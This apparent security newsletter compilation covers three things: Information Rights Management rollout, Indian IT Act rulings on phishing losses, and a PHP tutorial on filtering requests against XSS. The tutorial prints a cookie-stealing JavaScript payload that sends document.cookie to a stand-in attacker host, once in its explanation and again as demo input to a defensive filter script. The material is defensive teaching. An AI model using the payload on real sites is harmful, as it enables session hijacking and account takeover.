The strength of IRM is typically reserved for very sensitive information that travels outside the organization, to vendors, suppliers, outsourced parties, partners etc. But the challenges of proper authentication are quite complex outside the enterprise. Here, three approaches must be used together for an effective implementation of an enterprise IRM solution:

Automating policy assignment

The more automated the policy assignment, the better the IRM implementation. Automation eliminates the human errors inherent in manual processes, which in turn makes it more effective. Policies can automatically protect documents such as price lists, product specifications and manufacturing process descriptions. This works because if we let document authors be the sole arbiters of what to protect, it puts an unwelcome burden on them; they may neglect to do it correctly, consistently, or at all.

Organizations can automatically assign policies to entire groups of information, such as anything saved to a certain folder, content of a certain type, or information that has reached a particular stage in a workflow. This saves time, ensures consistency, and is the most efficient way to manage large volumes of sensitive information with IRM.

Dynamic policy control

As business conditions evolve, the IRM policies that govern the use of content must evolve as well. Regulatory changes, patent expirations, litigation settlements, mergers and acquisitions etc. will almost always require modifications to information policies. Dynamic policy control enables recipient entitlements to be changed when individual roles or business needs change, regardless of where the content resides, even when its location is unknown. Policies reside on a policy server, not within the content, so they can be changed or revoked at any time. Rights can also be set to expire automatically.

Discretionary policy application

In the enterprise, discretionary use of IRM is an option that should be used in addition to, rather than instead of, automated policy application.

Audit Trail

An audit trail is an unalterable, chronological log of access to a system and a record of additions, changes and deletions to the information that the system manages, listing the person accessing the system, the time of access and the action taken.

Steps before Implementing IRM

So you are all rolled up to implement an IRM solution in your company. Before that, answer this quick checklist:

Which business areas frequently exchange sensitive information?
What needs to be protected (documents, email etc.)?
How will security policies be enforced to protect this sensitive information or communication?
Who can use the information (people, groups)?
What can a user do with that information (read, write, print or forward)?
When can the user access the information (time duration and dates)?
Where can the information be accessed from (in the office, at home)?
What would be the consequences to the business if this information ended up in the wrong hands?
Does the organization retain any employee, customer or member information that could be used for identity theft if it were exposed, through loss or theft?

Popular IRM Vendor List

Seclore FileSecure
Microsoft Information Rights Management (built on Windows/Active Directory Rights Management Services)
Boole Server
SmartCipher
EMC IRM Product Suite

Challenges in IRM implementation

Lack of commitment by senior management

The biggest roadblock to a successful IRM implementation is inadequate commitment from senior management. Management has to be convinced of, and made aware of, the value of information to the business. The consequences of losing sensitive information must be highlighted: loss of brand image and reputation, and loss of client and stakeholder confidence. Unpleasant lawsuits may follow if the leakage of sensitive information is made public.

A common mistake senior managers make during implementation is to delegate the entire IRM implementation to the IT team and not take much responsibility for it. IRM must be driven from the top by senior management, which alone can bring about a cultural change in the organization. Without their support, the implementation at best stays patchy and disorganized.

User unwillingness to change

IRM's restrictive nature and perceived usage hassles may at first not gel easily with users. Users must undergo mandatory training and awareness workshops to ease them through this process. The suggested methodology can be summarized as:

Methodology for managers to induce change in users

Unfreezing: This step alters the forces on individuals sufficiently that they are motivated to opt for a change. It reduces user resistance through increased peer pressure to go along with the change.

Moving: This step presents the direction of the change and the actual practice of learning new attitudes.

Refreezing: The final step cements the changed attitudes and learned skills in users.

A good practice is to train some of the people in the organization and nurture them as champions of IRM usage. It is better if at least one person from every department is included in the IRM implementation task force. This task force works in close cooperation with the vendors and the security team during the implementation process.

After the official implementation is over, these champions provide the first point of reference and support for any IRM issues new users run into. Hence user satisfaction increases and, consequently, resistance to adopting the new technology is lowered.

Miscellaneous Factors

External user authentication for partners, vendors, suppliers and outsourced parties must be strong enough and well formed. Any loose ends will damage the confidentiality of the information.

Most IRM products, like Microsoft's Windows Rights Management Services, are great for Windows and Office, but they are mainly for Microsoft applications. For applications such as CAD or blueprints, the other solutions are either from small vendors or very limited in scope.

References:

1. http://www.iotap.com/Blog/tabid/673/entryid/61/Information-Rights-Management-Sharepoint-2010.aspx
2. http://en.wikipedia.org/wiki/Information_Rights_Management
3. http://blogs.kuppingercole.com/kuppinger/category/information-rights-management/
4. http://covertix.blogspot.in/
5. http://www.rcpbuyersguide.com/dload.php?file=whitepapers/SponsorIndex_EMC_Whitepaper11534369.pdf
6. http://www.niiconsulting.com/solutions/information_rights_management.html

Manas Deep

Manasdeep currently serves as a Security Analyst in the Technical Assessment team at NII Consulting, Mumbai. His work focuses on conducting security audits, vulnerability assessment and penetration testing for NII's premier clients.

He possesses strong analytical skills and likes to keep himself involved in learning new attack vectors, tools and technologies. He has a flair for technical writing and shares his thoughts on his blog "Experiencing Computing…" at http://manasdeeps.blogspot.in. He has also published information security paper(s) in the International Journal of Computer Science and Information Security (IJCSIS) along with various seminar/conference proceedings.

Landmark Cases Decided by the Adjudicating Officer under Chapter IX of the IT Act

(I) Shri. Thomas Raju Vs. The Branch Manager, ICICI Bank, Anna Nagar Branch, Chennai

Case decided by – the Adjudicating Officer, Government of Tamil Nadu.
Civil Jurisdiction.
Petition No. 3 of 2011
Dated – 16th May, 2011

The Petitioner, an employee of a Chennai-based IT company, suffered a loss of Rs. 1,62,800/- as a result of a phishing attack. The said amount was reportedly transferred to the account of another customer of ICICI Bank.

The Petitioner claimed that he had suffered a wrongful loss due to unauthorised access to his savings account at the Anna Nagar branch of ICICI Bank.

The Petitioner further claimed that he had suffered the loss because the bank had failed to exercise due diligence and to provide adequate checks and safeguards to prevent unauthorised access to his account. The bank had also not adhered to the KYC norms issued by the RBI.

The Adjudicating Officer directed ICICI Bank to pay damages to the Petitioner under Section 43 of the IT Act.

The following cases on the same subject matter were decided by the same authority:

(Note: Only citations are provided below; full judgments can be downloaded from http://www.tn.gov.in/departments/it.html)

I) S. Umashankar Vs. ICICI Bank
Case decided by – the Adjudicating Officer, Government of Tamil Nadu.
Civil Jurisdiction
Petition No. 2462 of 2008
Dated – 12th April, 2010

II) K.J. Jeevaka Arasu Vs. ICICI Bank
Case decided by – the Adjudicating Officer, Government of Tamil Nadu.
Civil Jurisdiction
Petition No. 1/e-gov. I/2011
Dated – 6th April, 2011

Sagar Rahurkar

Sagar Rahurkar holds a Master of Laws degree and is a Certified Fraud Examiner (CFE) and Certified Cyber Crime Investigator. He specializes in cyber law, fraud examination and intellectual property law. He has co-authored a book titled "Introduction to Cyber Crimes and Cyber Law". Currently he works with Mahindra Special Services Group in Fraud Risk Management.

Automatic Request Filter in PHP

Filtering plays a very important role when you are thinking about securing your application against malicious attacks. Security is a very important aspect of developing a web application. There are several kinds of attacks that could be used to break into your web application, and what the hacker gets out of it varies with the kind of attack. Suppose you have a SQL injection vulnerability in your application: using it, an attacker can do lots of things, the simplest being to read the information of the users registered in your web application, and once a hacker has information about your users he can do a lot more. However, we are not going to discuss that in detail here. Filtering does not let you fully secure your web application, but it does raise the level of security. The simplest attack that you can stop by request filtering is XSS. I will be giving you a step-by-step guide on how you can stop XSS in your web application using different techniques.

In this article we will try to answer some questions related to filtering:

What is filtering?
Why is it required?
How can we do request filtering in PHP?
Why do we need to automate it?
How can we automate it in PHP?

This is most helpful to someone who is seeking a quick reference to request filtering in PHP.

What is Filtering?

Filtering in general terms can be described as removing unwanted content from input, validating input data against some format, or converting input data into some format so that your application does not behave in an unwanted manner.

There are two main types of filtering: validation and sanitization.

Validation is checking whether the data being filtered meets certain criteria. For example, we can validate whether an email id is valid, as it needs to follow a proper pattern. Invalid data is rejected rather than repaired.

Sanitization is either removing or encoding special characters that may not be desired in a certain string. An example of sanitization is encoding <script> so that the browser receives it as text rather than as a tag. The encoding has to match where the output goes: for an HTML page that is entity encoding (&lt;script&gt;), while %3Cscript%3E is the URL-encoded form, which is the right one only when the value is placed inside a link. Why we need to do this is explained in the next section.


Why is Filtering Required?

Let's understand the importance of filtering with a scenario.

Suppose your web application has a Feedback section. A user need not be a member of the website to post feedback, and only the admin can view the feedback that was posted. If proper validation has not been done and a user can post malicious JavaScript as feedback, there is a problem. Let's understand how.

Suppose your application has a URL like:

    www.mysite.com/feedback.php

A hacker has set up an application that stores the cookies he has stolen. If proper validation is not done and your application is vulnerable to XSS, he can steal the admin's session with JavaScript similar to this, posted as feedback:

    <script language="javascript">
    document.location = "http://hackerSite.xyz/stealcookie.php?cookie=" + document.cookie
    </script>

When the admin opens the feedback page, the script runs in the admin's browser and redirects it to the hacker's application, which stores the admin's cookies; the hacker can then replay the session cookie and act as the admin. (document.cookie exposes only cookies set without the HttpOnly flag, so marking the session cookie HttpOnly blunts this particular payload, though not XSS in general.) What he can do with admin access depends on your application, but he has certainly broken into it, which should not happen in any case.

Now consider a comment page that everyone can view. A person posts a similar payload, and every user who views the page (or clicks such a link) has his account compromised. Compromised user accounts are a serious problem: you might be storing sensitive information about your users which, if it falls into the wrong hands, creates serious trouble for the users and for you.

In the next section we will look at how filtering can be implemented in PHP.

How can we do Request filtering in PHP?

To do request filtering you first have to catch the request and then filter the data in each request attribute. I will explain how to capture all the request attributes in PHP and then two ways of filtering them.

Let us first understand how we can capture all the request attributes.

PHP has three key-value arrays for handling a request: $_GET, $_POST and $_REQUEST.

$_GET holds all the attributes sent by the GET method (the query string).

$_POST holds all the attributes sent by the POST method (the request body).

$_REQUEST is a combination of $_GET and $_POST (and, depending on configuration, $_COOKIE). I would suggest that you do not depend on $_REQUEST alone: which arrays it contains, and which one wins when the same name appears in two of them, is decided by the request_order directive in php.ini (or variables_order when request_order is unset), so you might not get all attributes in $_REQUEST on every server.

To handle all of this there is a small piece of code. I have written it for the GET attributes of a request; the same approach applies to $_POST and $_REQUEST.


    if (!empty($_GET)) {
        foreach ($_GET as $key => $value) {
            // Filtering code to be put here
        }
    }

Just change $_GET to $_POST and $_REQUEST in the foreach to implement it for the other two.

Now we will look at how the filtering itself can be done, with two approaches.

1) Using htmlentities- htmlentities is a built-in PHP function that converts characters with a special meaning in HTML into HTML entities, so < is converted to "&lt;". The browser still displays it as <, but no longer treats it as HTML, so the JavaScript is not executed.

Here is the code for implementing htmlentities; just put it inside the foreach loop:

    $_GET[$key] = htmlentities($value);

One caveat: on PHP versions before 8.1 the default flags do not encode the single quote, which is enough to break out of a single-quoted attribute, so pass ENT_QUOTES (and the charset, e.g. 'UTF-8') explicitly when you use it.

2) Using Filters in PHP- The filter extension is very useful and you should use it to improve the security of your code. There are mainly two types of filters in PHP.

Validate filters- This set of filters checks whether data matches a certain pattern or qualification. An example is validating whether the user has entered a valid email address: an email follows a pattern like [email protected]. You can write your own algorithm to validate it or use PHP's filter functions; for email there is the FILTER_VALIDATE_EMAIL filter, which you pass to filter_var(). For more information on filters please see http://php.net/manual/en/book.filter.php.

Sanitize filters- Sanitization filters sanitize data by either encoding it or removing special characters. There are many sanitization filters and you can use them as your requirements dictate.

To filter data for stopping XSS we will use FILTER_SANITIZE_ENCODED, which URL-encodes the value so that < becomes %3C and > becomes %3E. Try it out and you will see the results and differences. This will help you block XSS attacks. Be aware that it encodes most punctuation as well (a space becomes %20), so the stored value no longer looks like what the user typed, and that the encoding is reversible: if anything later calls urldecode() on the value, the original payload is restored.

Here is the code for implementing this filter; just put it inside the foreach loop:

    $_GET[$key] = filter_var($value, FILTER_SANITIZE_ENCODED);
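As a worked example that brings the three pieces above together (capturing the request, the htmlentities approach and the filter_var approach), here is a complete filter script. It is added for this article and is not the author's code. It assumes a hypothetical location of /var/www/filter.php and goes beyond the snippets above in three ways: it walks nested arrays (a request such as ?tags[]=a&tags[]=b produces an array value, and htmlentities() on an array yields an empty string plus a warning, silently blanking the input), it filters keys as well as values, and it guards against being loaded twice. Run from the command line, it prints the result for a constructed feedback request carrying the cookie-stealing payload from the previous section.

```php
<?php
// filter.php -- added example for this article, not the author's code.
// Assumed to live at /var/www/filter.php and to be loaded through
// auto_prepend_file (php.ini or .htaccess) so it runs before every script.

declare(strict_types=1);

// Guard: if both php.ini and .htaccess name this file, or a page also
// require()s it, do not encode the same input twice.
if (defined('REQUEST_FILTER_LOADED')) {
    return;
}
define('REQUEST_FILTER_LOADED', true);

/**
 * Approach 1 from the article: HTML-encode each value so the browser shows
 * "<script>" as text instead of executing it. ENT_QUOTES also encodes the
 * single quote, which a bare htmlentities($value) leaves alone on PHP < 8.1;
 * ENT_SUBSTITUTE keeps invalid UTF-8 from turning the whole value into "".
 */
function sanitize_html(string $value): string
{
    return htmlentities($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Approach 2 from the article: URL-encode the value with the filter
 * extension. "<script>" becomes "%3Cscript%3E".
 */
function sanitize_encoded(string $value): string
{
    return (string) filter_var($value, FILTER_SANITIZE_ENCODED);
}

/**
 * Walk a request array recursively, applying $sanitizer to every string.
 * The article's loop handles only scalar values; nested arrays from
 * ?tags[]=a&tags[]=b would otherwise be blanked or skipped.
 */
function filter_request(array $input, callable $sanitizer): array
{
    $clean = [];
    foreach ($input as $key => $value) {
        // Keys are attacker-controlled too (?<img>=x), so filter them as well.
        $cleanKey = is_string($key) ? $sanitizer($key) : $key;
        $clean[$cleanKey] = is_array($value)
            ? filter_request($value, $sanitizer)
            : $sanitizer((string) $value);
    }
    return $clean;
}

// When prepended by the web server, filter the three superglobals the
// article discusses and stop; nothing below runs for a real request.
if (PHP_SAPI !== 'cli') {
    $_GET     = filter_request($_GET, 'sanitize_html');
    $_POST    = filter_request($_POST, 'sanitize_html');
    $_REQUEST = filter_request($_REQUEST, 'sanitize_html');
    return;
}

// Constructed demo input for command-line runs: the article's cookie-stealing
// payload submitted as a feedback field, plus a quote and a nested array.
$demo = [
    'name'     => "Bob O'Neil",
    'feedback' => '<script>document.location="http://hackerSite.xyz/stealcookie.php?cookie="+document.cookie</script>',
    'tags'     => ['<b>bold</b>', 'ok'],
];

print_r(filter_request($demo, 'sanitize_html'));
print_r(filter_request($demo, 'sanitize_encoded'));

// Caveat for approach 2: URL-encoding is reversible. A later urldecode()
// anywhere in the application restores the payload byte for byte.
$encoded = sanitize_encoded($demo['feedback']);
var_dump(urldecode($encoded) === $demo['feedback']);

// Trade-off of approach 1: a page that also encodes on output (the usual
// recommendation) now double-encodes, and the user sees a literal "&lt;b&gt;".
echo htmlspecialchars(sanitize_html('<b>bold</b>'), ENT_QUOTES, 'UTF-8'), PHP_EOL;
```

To deploy it, point the directive from the automation section at the file: `auto_prepend_file = "/var/www/filter.php"` in php.ini, or `php_value auto_prepend_file "/var/www/filter.php"` in the application's .htaccess. The script deliberately writes nothing to output when run under the web server, because any output from a prepended file is sent before the page's own headers. Encoding at input time is the quick retrofit this article sets out to provide; the last two demo lines show why encoding at the point of output remains the cleaner long-term design.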

Why do we need to automate it?

You might be thinking that we can put this code in a single file and include it in each script with require_once. That approach seems good, but consider the case where your web application already exists and contains anywhere from a few hundred to thousands of scripts. Adding the include to every page is a tedious job and you may miss some pages. So what can we do? The answer is to automate the prepending of the script. How to do that is explained in the next section.


How can we automate it in PHP?

I will explain two approaches to automating this in PHP. Both can be used for many things apart from filtering.

1) Using php.ini – As a PHP developer you should know about the php.ini file. It is the configuration file from which PHP loads its settings (when PHP runs as an Apache module it is read when Apache starts). Common examples of what it controls are the maximum upload size, the maximum execution time of a script, register_globals and so on. We are more interested in how to force a script to be prepended to every script the web application has, without touching the code. To do this, open your php.ini file in a text editor and search for auto_prepend_file. The line looks like this:

    auto_prepend_file = ""

PHP can append a script (auto_append_file) as well as prepend one; here we need to prepend. Put the absolute path of the filter script you created with the methods explained above inside the quotes.

To apply these settings you need to restart your server, because the Apache PHP module reads php.ini only when it starts. (Under PHP-FPM, restart or reload the FPM service instead.)

Now the question is where you should do configuration like this. Your server may host many web applications. If you want your script applied to every script of every application hosted on the server, go for the php.ini setting; if you want it applied to one particular web application, use the approach below.

2) Using .htaccess- .htaccess is a configuration file used by the Apache web server to configure web applications on a per-directory basis. Look for a .htaccess file inside your web application; if there is none, create one. Whenever a document is requested, the .htaccess files on its path are also read, so this may affect performance.

To implement it, add the following line to the .htaccess file:

    php_value auto_prepend_file ""

Put the absolute or relative path of your filter file inside the double quotes (a relative path is resolved against include_path, so an absolute path is the safer choice). In this case you do not need to restart your server.

Two checks before relying on this: php_value directives in .htaccess are honoured only when PHP runs as an Apache module (mod_php) and the directory allows them (AllowOverride Options or All); under PHP-FPM or FastCGI they are ignored, and the equivalent setting goes into a .user.ini file in the application directory instead.

The .htaccess file can be used for a lot of other things as well.

So this is how you can automate request filtering in PHP. We have created a simple filter for stopping XSS, but you can create your own custom filter using the same approach, as per your requirements.

Paras Vij [email protected]
